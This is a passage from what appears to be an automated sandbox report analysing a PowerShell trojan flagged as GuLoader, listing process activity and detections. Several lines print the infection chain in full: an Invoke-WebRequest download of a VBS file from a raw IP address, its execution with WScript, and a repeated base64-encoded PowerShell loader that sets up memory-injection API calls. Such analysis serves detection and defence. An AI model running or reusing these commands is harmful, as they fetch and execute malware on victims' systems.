dADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAJump to behavior
    Very long command line found
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4264
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4264Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFF7F0019781_2_00007FFF7F001978
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFF7F0119583_2_00007FFF7F011958
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1FA4014_2_07A1FA40
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1A34014_2_07A1A340
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1A35014_2_07A1A350
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B0820014_2_07B08200
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B0820014_2_07B08200
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B0001E14_2_07B0001E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B0004014_2_07B00040
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs" Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_01
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220510Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eghthspv.xqw.ps1Jump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winPS1@13/19@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1D7DD push FFFFFF8Bh; iretd 14_2_07A1D7E2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1D589 push FFFFFF8Bh; iretd 14_2_07A1D58E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A10D5A push eax; mov dword ptr [esp], edx14_2_07A10D6C
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
